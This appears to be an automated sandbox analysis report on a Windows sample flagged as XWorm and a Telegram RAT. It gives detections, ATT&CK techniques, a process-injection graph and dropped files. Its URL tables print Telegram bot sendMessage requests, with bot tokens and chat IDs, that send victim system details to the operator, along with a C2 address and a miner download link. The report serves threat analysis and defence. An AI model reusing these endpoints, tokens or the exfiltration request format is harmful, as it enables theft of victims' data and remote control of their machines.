                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3905812861.000000000307B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe PID: 432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 3416, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe PID: 432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: spczxf.exe PID: 2908, type: MEMORYSTR
                  Yara detected XWorm
                  Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3905812861.000000000307B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe PID: 432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 3416, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  Credential API Hooking                  		1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API                  		1
                  Windows Service                  		1
                  Windows Service                  		11
                  Deobfuscate/Decode Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop Protocol1
                  Credential API Hooking                  		2
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		11
                  Scheduled Task/Job                  		411
                  Process Injection                  		2
                  Obfuscated Files or Information                  		Security Account Manager37
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive21
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts11
                  Scheduled Task/Job                  		12
                  Registry Run Keys / Startup Folder                  		11
                  Scheduled Task/Job                  		2
                  Software Packing                  		NTDS361
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts1
                  Service Execution                  		Network Logon Script12
                  Registry Run Keys / Startup Folder                  		1
                  Timestomp                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials151
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture13
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                  Rootkit                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Masquerading                  		Proc Filesystem1
                  Remote System Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron411
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Files and Directories                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416943 Sample: SecuriteInfo.com.Win64.PWSX... Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 113 api.telegram.org 2->113 115 wmploc.dll 2->115 117 2 other IPs or domains 2->117 125 Found malware configuration 2->125 127 Malicious sample detected (through community Yara rule) 2->127 129 Antivirus detection for URL or domain 2->129 133 24 other signatures 2->133 12 SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe 2 2->12         started        15 svchost.exe 1 1 2->15         started        18 svchost.exe 32 2->18         started        20 3 other processes 2->20 signatures3 131 Uses the Telegram API (likely for C&C communication) 113->131 process4 dnsIp5 163 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->163 165 Writes to foreign memory regions 12->165 167 Injects a PE file into a foreign processes 12->167 22 jsc.exe 15 7 12->22         started        27 WerFault.exe 19 16 12->27         started        123 127.0.0.1 unknown unknown 15->123 29 WerFault.exe 2 18->29         started        31 WerFault.exe 18->31         started        33 WerFault.exe 18->33         started        39 2 other processes 18->39 35 conhost.exe 20->35         started        37 conhost.exe 20->37         started        signatures6 process7 dnsIp8 119 104.194.9.116, 49713, 7000 RELIABLESITEUS United States 22->119 121 api.telegram.org 149.154.167.220, 443, 49704 TELEGRAMRU United Kingdom 22->121 105 C:\Users\user\AppData\Local\Temp\utntwb.exe, PE32+ 22->105 dropped 107 C:\Users\user\AppData\Local\Temp\spczxf.exe, PE32+ 22->107 dropped 109 C:\Users\user\AppData\Local\Temp\ohvrxt.exe, PE32+ 22->109 dropped 111 C:\Users\user\AppData\Local\Temp\hgzxhw.exe, PE32+ 22->111 dropped 145 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->145 41 hgzxhw.exe 22->41         started        44 utntwb.exe 22->44         started        46 spczxf.exe 22->46         started        48 ohvrxt.exe 22->48         started        file9 signatures10 process11 signatures12 147 Multi AV Scanner detection for dropped file 41->147 149 Machine Learning detection for dropped file 41->149 151 Writes to foreign memory regions 41->151 153 Allocates memory in foreign processes 41->153 50 MSBuild.exe 41->50         started        66 3 other processes 41->66 155 Modifies the context of a thread in another process (thread injection) 44->155 157 Injects a PE file into a foreign processes 44->157 159 Reads the Security eventlog 44->159 53 wmplayer.exe 44->53         started        68 2 other processes 44->68 161 Reads the System eventlog 46->161 56 aspnet_wp.exe 46->56         started        58 WerFault.exe 46->58         started        60 aspnet_wp.exe 48->60         started        62 aspnet_wp.exe 48->62         started        64 WerFault.exe 48->64         started        process13 file14 99 C:\Users\user\AppData\Local\...\msbuild.exe, PE32 50->99 dropped 70 cmd.exe 50->70         started        101 C:\ProgramData\...\pkiwizgebqxq.exe, PE32+ 53->101 dropped 135 Modifies the context of a thread in another process (thread injection) 53->135 137 Adds a directory exclusion to Windows Defender 53->137 73 powershell.exe 53->73         started        75 cmd.exe 53->75         started        77 sc.exe 53->77         started        103 C:\Users\user\AppData\...\Microsoft.exe, PE32+ 56->103 dropped 139 Drops PE files to the startup folder 56->139 79 conhost.exe 56->79         started        signatures15 process16 signatures17 141 Uses schtasks.exe or at.exe to add and modify task schedules 70->141 143 Uses ping.exe to check the status of other devices and networks 70->143 81 msbuild.exe 70->81         started        83 conhost.exe 70->83         started        85 chcp.com 70->85         started        95 2 other processes 70->95 87 conhost.exe 73->87         started        89 WmiPrvSE.exe 73->89         started        91 conhost.exe 75->91         started        93 conhost.exe 77->93         started        process18 process19 97 conhost.exe 81->97         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe45%ReversingLabsWin64.Backdoor.Xworm
                  SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe49%VirustotalBrowse
                  SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe100%AviraHEUR/AGEN.1313962
                  SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\hgzxhw.exe100%Joe Sandbox ML
                  C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe0%ReversingLabs
                  C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe0%VirustotalBrowse
                  C:\Users\user\AppData\Local\ServiceHub\msbuild.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\ServiceHub\msbuild.exe0%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\hgzxhw.exe35%ReversingLabsByteCode-MSIL.Trojan.Fsysna
                  C:\Users\user\AppData\Local\Temp\hgzxhw.exe49%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\ohvrxt.exe62%ReversingLabsByteCode-MSIL.Trojan.Nekark
                  C:\Users\user\AppData\Local\Temp\ohvrxt.exe50%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\spczxf.exe41%ReversingLabsByteCode-MSIL.Trojan.Fsysna
                  C:\Users\user\AppData\Local\Temp\spczxf.exe48%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\utntwb.exe46%ReversingLabsByteCode-MSIL.Trojan.Fsysna
                  C:\Users\user\AppData\Local\Temp\utntwb.exe32%VirustotalBrowse
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe0%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://Passport.NET/STS0%URL Reputationsafe
                  http://Passport.NET/STS0%URL Reputationsafe
                  https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe0%Avira URL Cloudsafe
                  104.194.9.116100%Avira URL Cloudmalware
                  https://account.live.co0%Avira URL Cloudsafe
                  http://Passport.NET/tbpose0%Avira URL Cloudsafe
                  http://Passport.NET/tb_S0%Avira URL Cloudsafe
                  http://Passport.NET/tb0%Avira URL Cloudsafe
                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%Avira URL Cloudsafe
                  https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe1%VirustotalBrowse
                  http://Passport.NET/tbpose0%VirustotalBrowse
                  http://Passport.NET/tb_0%Avira URL Cloudsafe
                  http://crl.ver)0%Avira URL Cloudsafe
                  https://account.live.co0%VirustotalBrowse
                  https://login.ecur0%Avira URL Cloudsafe
                  http://Passport.NET/tb0%VirustotalBrowse
                  http://Passport.NET/tb_0%VirustotalBrowse
                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%VirustotalBrowse
                  104.194.9.1163%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    fp2e7a.wpc.phicdn.net
                    		192.229.211.108
                    		truefalseunknown
                    wmploc.dll
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      104.194.9.116true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=6585536474&text=User%205814831126857437469%20ran%20the%20malwarefalse
                        		high
                        https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845&text=%E2%98%A0%20%5BXWorm%20V5.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB83F65D83688BE31381B%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20UZK6EYLC%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20pdr326false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdDatasvchost.exe, 00000007.00000003.1623093821.0000023D06F78000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://Passport.NET/tb_Ssvchost.exe, 00000007.00000002.3901404764.0000023D0763F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgspczxf.exe, 00000008.00000002.1738420103.000001A4C3F01000.00000004.00000800.00020000.00000000.sdmp, aspnet_wp.exe, aspnet_wp.exe, 0000000C.00000002.3891911934.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botSecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3905812861.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exeMSBuild.exe, 0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3900899316.0000023D06F37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://Passport.NET/STSsvchost.exe, 00000007.00000003.1615716729.0000023D06F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615551078.0000023D06F74000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000007.00000002.3899970594.0000023D066D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://Passport.NET/tbposesvchost.exe, 00000007.00000002.3901317588.0000023D07615000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623217210.0000023D06F6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/%taspnet_wp.exe, 0000000C.00000002.3893768041.000002109A396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/scTokensvchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtsvchost.exe, 00000007.00000003.1483104918.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1472186772.0000023D06F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1621653752.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615838848.0000023D06F31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuelssvchost.exe, 00000007.00000003.1623217210.0000023D06F6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsssvchost.exe, 00000007.00000003.1483104918.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1472186772.0000023D06F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1621653752.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615838848.0000023D06F31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://account.live.cosvchost.exe, 00000007.00000003.3864858154.0000023D06702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://Passport.NET/tbsvchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1472186772.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.1623093821.0000023D06F78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615838848.0000023D06F31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1717308062.0000023D06F84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1482586939.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.1615551078.0000023D06F74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejsc.exe, 00000003.00000002.3905812861.0000000003041000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=65855aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://Passport.NET/tb_svchost.exe, 00000007.00000002.3901404764.0000023D0763F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3901255269.0000023D07600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • 0%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0aspnet_wp.exe, 0000000C.00000002.3892524455.000000BA8DFFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://login.microsoftonline.com/MSARST2.srf=svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/scs-cbcsvchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000003.1622108525.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1636876411.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1643671089.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000007.00000002.3900899316.0000023D06F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://account.live.com/msangcwamsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470166584.0000023D06F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
